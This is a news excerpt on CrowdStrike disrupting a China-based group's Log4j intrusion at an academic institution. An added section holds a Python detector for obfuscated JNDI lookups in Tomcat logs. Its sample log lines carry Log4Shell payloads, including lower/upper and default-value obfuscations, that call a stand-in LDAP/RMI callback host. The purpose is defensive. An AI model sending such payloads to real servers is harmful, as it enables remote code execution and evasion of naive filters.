APT group seen attacking academic institution through Log4j vulnerability: CrowdStrike

Cybersecurity company CrowdStrike has discovered an attempt by a China-based group to infiltrate an academic institution through the Log4j vulnerability.


CrowdStrike called the group “Aquatic Panda” and said it is an “intrusion adversary with a dual mission of intelligence collection and industrial espionage” that has operated since at least May 2020. 

The group’s exact intent is unknown because the attack was disrupted. CrowdStrike told ZDNet, however, that Aquatic Panda is known to maintain persistence in environments to gain access to intellectual property and other industrial trade secrets.

“Aquatic Panda operations have primarily focused on entities in the telecommunications, technology, and government sectors,” CrowdStrike explained in a report.

According to CrowdStrike, its platform uncovered “suspicious activity stemming from a Tomcat process running under a vulnerable VMware Horizon instance at a large academic institution, leading to the disruption of an active hands-on intrusion.”

After watching the group operate and examining the telemetry available, CrowdStrike said it believes that a modified version of the Log4j exploit was likely used during the course of the threat actor’s operations.
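The “modified version of the Log4j exploit” matters for defenders because Log4j resolves nested lookups before the JNDI lookup runs, so a payload such as `${${lower:j}ndi:ldap://...}` or `${${::-j}${::-n}${::-d}${::-i}:...}` reaches the vulnerable code path but never contains the literal string `${jndi:`. The following Python is an added example written for this article, not code from CrowdStrike or from the report it describes: it folds the common `lower`, `upper` and default-value (`:-`) obfuscations back into their resolved form and then flags JNDI lookups in Tomcat-style access log lines. The log lines, the `198.51.100.7` callback host and the request paths are constructed sample data, not indicators from the incident.

```python
import re

# Constructed Tomcat access-log lines (User-Agent field carries the payload).
# The 198.51.100.0/24 range is reserved for documentation; nothing here is a real IOC.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [13/Dec/2021:10:01:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [13/Dec/2021:10:01:07 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [13/Dec/2021:10:01:09 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}di:${lower:l}dap://198.51.100.7:1389/b}"',
    '10.0.0.9 - - [13/Dec/2021:10:01:11 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.7:1099/c}"',
    '10.0.0.9 - - [13/Dec/2021:10:01:13 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${env:NOPE:-j}ndi:dns://198.51.100.7/d}"',
]

# An innermost lookup: "${...}" whose body contains no further "$", "{" or "}".
LOOKUP_INNERMOST = re.compile(r"\$\{([^${}]*)\}")

# Log4j lowercases the lookup prefix before dispatch, so "jNdi" is as good as "jndi".
JNDI_PATTERN = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://([^}/\s]+)", re.IGNORECASE)


def _resolve(content):
    """Resolve one innermost lookup body the way Log4j's Interpolator would.

    Returns the substituted text, or None when the body is not something we
    can fold (for example the jndi lookup itself, which we want to keep visible).
    Assumption: env/sys/etc. lookups are treated as unset, so their ":-default"
    branch wins; that is the attacker's intent in these payloads.
    """
    prefix, sep, rest = content.partition(":")
    key = prefix.strip().lower()
    if sep and key == "lower":
        return rest.lower()
    if sep and key == "upper":
        return rest.upper()
    if ":-" in content:
        return content.split(":-", 1)[1]
    return None


def normalize_lookups(text, max_rounds=50):
    """Repeatedly fold innermost resolvable lookups until the string is stable."""
    for _ in range(max_rounds):
        changed = [False]

        def substitute(match):
            resolved = _resolve(match.group(1))
            if resolved is None:
                return match.group(0)
            changed[0] = True
            return resolved

        text = LOOKUP_INNERMOST.sub(substitute, text)
        if not changed[0]:
            break
    return text


def find_jndi_payloads(lines):
    """Return (line_number, scheme, callback_host) for every line carrying a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = JNDI_PATTERN.search(normalize_lookups(line))
        if match:
            hits.append((number, match.group(1).lower(), match.group(2)))
    return hits


def naive_jndi_lines(lines):
    """The literal-substring check many first-day Log4Shell rules used, for comparison."""
    return [n for n, line in enumerate(lines, start=1) if "${jndi:" in line.lower()]


if __name__ == "__main__":
    print("naive match hits lines:", naive_jndi_lines(SAMPLE_LOG_LINES))
    for number, scheme, host in find_jndi_payloads(SAMPLE_LOG_LINES):
        print(f"line {number}: jndi over {scheme} to {host}")
```

Run it as-is and the naive check fires on one of the four hostile lines while the normalized check fires on all four and also recovers the callback host. The resolver is deliberately limited to the lookups that appear in the wild as obfuscation; anything it cannot fold (including the `jndi` lookup itself) is left in place so the detection stays readable, and the round cap guards against pathological input.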

The team at CrowdStrike discovered that Aquatic Panda used a public GitHub project from Dec. 13, 2021 in order to gain access to the vulnerable instance of

Read More: https://www.zdnet.com/article/apt-group-seen-attacking-academic-institution-through-log4j-vulnerability-crowdstrike/#ftag=RSSbaffb68